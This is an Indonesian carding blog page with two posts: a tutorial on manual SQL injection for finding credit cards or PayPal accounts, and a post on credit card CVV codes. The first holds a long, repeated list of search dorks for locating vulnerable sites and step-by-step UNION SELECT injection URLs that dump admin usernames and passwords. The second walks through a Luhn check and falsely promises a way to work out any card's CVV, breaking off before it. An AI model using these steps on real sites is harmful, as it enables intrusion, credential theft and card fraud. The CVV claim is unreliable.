Showing posts with label CARDER. Show all posts
  • Tutorial]cara mencari CC atau akun paypal dengan SQL INJECTION Manual

    SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error

    Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url


    Dork list:


    Code:
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=d=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?av
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:tran******.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inur l: info.php?id=
    inurl : pro.php?id=
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:tran******.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:shop+php?id+site:fr
    “inurl:admin.asp”
    “inurl:login/admin.asp”
    “inurl:admin/login.asp”
    “inurl:adminlogin.asp”
    “inurl:adminhome.asp”
    “inurl:admin_login.asp”
    “inurl:administratorlogin.asp”
    “inurl:login/administrator.asp”
    “inurl:administrator_login.asp”
    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:login.asp
    index of:/admin/login.asp
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:produit.php?id=+site:fr
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=

    Quote:Contoh :
    http://impgang dot com/news.php?id=14’
    http://impgang dot com/news.php?id=’14

    Apabila terlihat pesan error seperti ini :
    Quote:You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

    Maka bisa dipastikan situs tersebut terdapat bug SQL Injection :D

    Lalu lanjut lagi menentukan Jumlah Kolom
    caranya :
    Quote: http://www.site.com/news.php?id=7 order by 1-- || Gak Error

    http://www.site.com/news.php?id=7 order by 2-- || Gak Error

    http://www.site.com/news.php?id=7 order by 3-- || Gak Error

    http://www.site.com/news.php?id=7 order by 4-- || Gak Error

    http://www.site.com/news.php?id=7 order by 5-- || Gak Error

    http://www.site.com/news.php?id=7 order by 6-- || Gak Error

    http://www.site.com/news.php?id=7 order by 7-- || error

    Nah kita mengetahui kalau kolom ke 7 itu Error artinya Website hanya memiliki 6 Kolom karena pada kolom nomor 7 sudah tidak ada hubungannya dengan kolom yang lainnya.
    Jika kita membuka kolom yang Error maka terlihat seperti ini:
    Quote:Unknown column '7' in 'order clause'


    Lalu selanjutnya kita gunakan perintah fungsi union untuk menampilkan area kolom yang vuln . Gunakan perintah "Union Select" tanpa tanda petik.
    caranya, ganti kata "order by" menjadi "Union Select", lalu setelah "id=" kita tambahkan saja tanda (-) gak pake tanda kurung lalu jika error tepat pada angka yg vuln (contoh angka 7) maka kalian urutkan dari angka 1 sampai 6 karena angka 7 Error.

    Terlihat seperti ini:
    Quote:Sebelum
    http://www.site.com/news.php?id=7 order by 6-- (Karena Angka 7 Error Maka di ganti menjadi 6)

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--
    jika berhasil seharusnya kita bisa melihat area kolom yang vuln.
    maksudnya begini, area kolom yang vuln itu adalah nomor yang barusan kita buat lalu terpampang di website . Jadi begini, kalian sudah mencari vuln dengan urutan 1,2,3,4,5,6 . maka dari urutan 1,2,3,4,5,6 pasti akan terpampang salah satu nomor tersebut di website.

    Next setelah itu kita akan mencoba Cek Versi MYSQL yang digunakan
    untuk mengetahui versi mysql kita gunakan "@@version" atau "version()" tanpa tanda petik.Dari hasil sebelumnya, sekarang kita gunakan untuk mengecek versi mysql, caranya ikuti langkah berikut. Misalkan kolom yang vuln yang tampil adalah nomor 4 maka ganti saja kolom 4 dengan "@@version" sehingga urlnya menjadi:
    Quote:Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--
    Sekarang kita bisa melihat versinya seperti 5.0.96 atau versi yang lainnya tetapi versi harus memiliki angka 5 didepannya.

    Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah "@@version" dengan "group_concat(table_name)" dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir , sebelum tanda --
    Contohnya begini:
    Quote:Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
    Nah terlihat ada nama table table di site yg kalian praktekkan
    misalnya terlihat ada table admin, research, vcounter
    maka kita akan memproses table admin sehingga kita mendapatkan Username dan Passwordnya, tetapi sayangnya, tidak semua website langsung menampakkan Table admin,tapi kalian bisa cari disatu-satu table yang muncul disite kalian.

    Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" dan mengganti perintah "information_schema.tables" menjadi "information_schema.columns" juga mengganti perintah "table_schema=database()" dengan perintah "table_name=" lalu menambahkan nama tablenya tapi yg sudah di convert menjadi hex sesudah tanda (=) tanpa tanda kurung dan diawali dengan 0x . Ini website untuk convert Text menjadi Hex
    Contohnya begini:
    Admin < Ini Text
    lalu di convert ke Hex dan tambahkan "0x" diawal maka jadilah
    Admin(text) -> 61646d696e(hex) -> 0x61646d696e(table)
    nah jadi terlihat link seperti ini:
    Quote:Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

    Contoh Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=HASIL CONVERT TEXT KE HEX--

    Note :HASIL CONVERT TEXT KE HEX yaitu hasil convert dari nama table yang barusan kalian Convert

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--
    nah tiba-tiba muncul kolom id,admin_id,admin_pass pada tabel admin tadi.

    Oke selanjutnya cara mengeluarkan data column,caranya cukup gampang
    kalian tinggal mengganti "group_concat(column_name)" menjadi "group_concat(admin_id,0x3a,admin_pass)" lalu ganti "information_schema.columns where table_name=CODEHEX--" menjadi "admin"

    Question : mengapa saya masukkan admin_id,0x3a,admin_pass dan apa maksud dari 0x3a lalu kenapa "information_schema.columns where table_name=CODEHEX" diganti menjadi "admin"?

    Answer : karena admin_id dan admin_pass adalah nama kolom pada tabel Admin yang barusan saya convert ke Hex.
    kalau 0x3a itu sebenarnya Code jika kita convert ke hex itu artinya (:) titik dua. saya menggantinya karena perintah itu tidak digunakan lagi karena kita sudah menemukan Tabel dan Kolomnya dan makanya saya hapus Information_schema.columns... dan menggantinya menjadi admin karena kita akan membongkar isi tabel tersebut.


    WARNING:JANGAN SAMAKAN NAMA TABEL CONTOH INI DENGAN NAMA TABEL YANG SEDANG ANDA PRAKTEKKAN


    Maka terlihat seperti ini:
    Quote:Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(admin_id,0x3a,admin_pass),5,6 from admin--
    Akhirnya berhasil.. kalian akan mendapatkan username dan password admin diwebsite yang barusan kalian praktekan
    contohnya seperti ini:
    [Image: step7.png]

    Setelah itu cari halaman login admin di website setelah itu loginkan username adminnya dan dump semua databasenya
  • Carding Php

    [Image: Credit-Cards_Merithew.jpg]

    Pada bagian ini anda akan mengetahui rahasia tersembunyi tentang Kartu Kredit,meliputi : Kode Rahasia CVV (Cardholder VerificationValue) Kode Rahasia CVV (Cardholder Verivication Value)
    Setiap Kartu Kredit dilengkapi dengan 3 atau

    4 KODE ANGKA RAHASIA, yang sering dikenal sebagai CVV (Cardholder Verification Value). CVV memiliki banyak sebutan lainnya, misalnya : CSC (Card Security Code) atau CVN (Card Verification Number).

    • Perusahaan Visa menyebutnya sebagai CVV2, • Mastercard menyebutnya sebagai CVC2, • Diners Club menyebutnya sebagai CVV2, • Perusahaan American Express menyebutnya CIN (Card Identification Number).

    Visa dan Mastercard Memiliki 3 digit CVV/ CVC, sedangkan American Express Memiliki 4 digit CIN. Biasanya CVV ini terletak di bagian belakang kartu kredit, yang merupakan nomor otorisasi manual untuk kartu kredit supaya bisa melakukan transaksi. Jika anda biasa belanja di Hypermarket / Supermarket dengan menggunakan Kartu Kredit, coba perhatikan,

    biasanya seorang Kasir yang teliti, setelah menggesek Kartu Kredit Anda, dia akan membalik Kartu Kredit Anda untuk mengecek 3 DIGIT CVV Anda yang muncul di layar komputernya. Tapi biasanya jika Kartu Kredit Anda memiliki foto, seorang kasir tidak perlu melihat CVV Anda, tapi dia hanya perlu mencocokkan foto anda di kartu dengan diri anda, jadi jangan heran apalagi Ge-Er apabila seorang kasir yang cantik melirik anda ….. hehehe …. CVV jauh lebih sering digunakan untuk TRANSAKSI yang tidak menggunakan Kartu Kredit secara fisik, tapi Lebih Sering digunakan untuk mengecek pembelanjaan secara Online / Via Internet. Jadi Dengan Adanya CVV ini , maka sang pemilik Kartu Kredit akan merasa amandalam mencegah orang yang tidak diinginkan melakukan transaksi denganmenggunakan Nomor Kartu Kredit miliknya. BENARKAH ? 00 % SALAH !!!! Anda akan mengetahui bagaimana cara

    mengetahui Nomer Kode Rahasia CVV dari

    kartu kredit manapun juga … !!! Syaratnya

    hanya 1, anda harus mengetahui NOMER

    KARTU KREDITnya , Tidak Bisa Ditawar-

    Tawar … !!! Silahkan dibaca terus… Mengetahui apakah suatu Kartu Kredit Valid

    atau Tidak Cara Rahasia Mengetahui apakah suatu

    Kartu Kredit Valid atau Tidak. Setiap anda

    berbelanja menggunakan Kartu Kredit, maka

    ada suatu proses keabsahan suatu Kartu

    Kredit yang dikenal dengan nama

    Authentifikasi, yaitu suatu proses pengecekan apakah kartu kredit yang anda

    gunakan masih Valid Atau Tidak. Biasanya

    pengecekan akan lebih mudah dengan

    menggunakan mesin atau sistem, tapi

    tahukah anda bahwa anda bisa juga

    melakukan pengecekan apakah Kartu Kredit yang anda miliki Valid atau tidak ? Lalu

    bagaimanakah cara pengecekannya ? Mari

    kita simak bersama : Contoh : Misalnya No. Kartu Kreditnya adalah

    5378-5432-1011-8224 Saya Ingin

    mengetahui apakah nomor Kartu Kredit itu

    Valid atau Tidak ? Begini caranya :

    Terdapat 16 DIGIT pada Nomer Kartu Kredit

    Tersebut. Langkah I, Kalikan SEMUA ANGKA pada DIGIT GANJIL

    dengan “2”, lalu : - Jika hasilnya Lebih dari 9 maka KURANGI

    HASILNYA dengan “9”,

    - Jika hasilnya Kurang dari 9, biarkan saja.

    Setelah itu JUMLAHKAN SEMUANYA.

    Digit 1 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10

    – 9 = 1 Digit 3 : 7 ; 7×2 = 14 {Lebih dari 9}, jadi 14

    – 9 = 5

    Digit 5 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10

    – 9 = 1

    Digit 7 : 3 ; 3×2 = 6 {Biarkan saja, karena

    KURANG DARI 9} Digit 9 : 1 ; 1×2 = 2 {Biarkan saja, karena

    KURANG DARI 9}

    Digit 11 : 1 ; 1×2 = 2 {Biarkan saja, karena

    KURANG DARI 9}

    Digit 13 : 8 ; 8×2 = 16 {Lebih dari 9}, jadi

    16 – 9 = 7} Digit 15 : 2 ; 2×2 = 4 {Biarkan saja, karena

    KURANG DARI 9}

    Lalu jumlahkan :

    1 + 5 + 1 + 6 + 2 + 2 + 7 + 4 = 28 Langkah II, Jumlahkan Digit yang ada di posisi Genap

    pada data No. Kartu Kredit

    5378-5432-1011-8224 Digit 2 : 3

    Digit 4 : 8

    Digit 6 : 4

    Digit 8 : 2

    Digit 10 : 0

    Digit 12 : 1 Digit 14 : 2

    Digit 16 : 4

    ————— +

    Jumlah : 24 Langkah III, Jumlahkan hasil Langkah I dengan Langkah

    II

    28 + 24 = 52

    Karena 52 TIDAK HABIS DIBAGI dengan

    “10” (Masih menyisakan bilangan

    desimal yaitu 5,2) , maka KARTU KREDIT ITU TIDAK VALID / TIDAK SAH / TIDAK

    DAPAT DIGUNAKAN.

    Mudah, bukan ? Cara Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari Kartu Kredit apapun Nah ini dia yang ditunggu – tunggu, saya akan memberitahu anda cara mengetahui

    Nomer Kode Rahasia CVV / CVN /CIN dari Nomer Kartu Kredit jenis Apapun. Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari KartuKredit apapun Misal saya ambil contoh no. Kartu Kredit :

